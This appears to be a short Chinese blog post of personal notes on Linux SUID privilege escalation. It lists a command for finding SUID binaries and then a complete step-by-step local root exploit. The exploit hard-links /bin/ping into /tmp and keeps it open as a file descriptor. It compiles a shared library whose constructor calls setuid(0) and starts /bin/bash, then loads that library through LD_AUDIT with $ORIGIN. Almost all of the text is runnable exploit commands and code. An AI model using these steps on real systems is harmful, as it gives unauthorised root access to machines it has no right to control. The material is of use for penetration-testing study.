SUID提权

前言:SUID提权笔记

标志位寻找

find / -perm -04000 -type f -ls 2>/dev/null

ping提权

查看tmp目录权限

ll -d /tmp

切换到tmp目录

cd /tmp

创建一个exploit目录

mkdir exploit

查看ping命令带suid权限
ll /bin/ping

创建target文件硬链接

ln /bin/ping /tmp/exploit/target

查看target文件权限

ll /tmp/exploit/target

把target文件加载到内存中

exec 3< /tmp/exploit/target

查看target在内存中的情况

"ll /proc/$$/fd/3"

删除target文件

rm -rf /tmp/exploit/

查看target在内存中的情况是删除状态

"ll /proc/$$/fd/3"

创建一个payload.c文件

void __attribute__((constructor)) init()  // 两个下划线
{
     setuid(0);
     system("/bin/bash");
}

利用gcc编译这段代码

gcc -W -fPIC -shared -o /tmp/exploit payload.c

提升到root权限

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

执行完,查看当前会话已经是root

whoami

posted @ 2019-10-17 19:03  zpchcbd  阅读(1975)  评论(0编辑  收藏  举报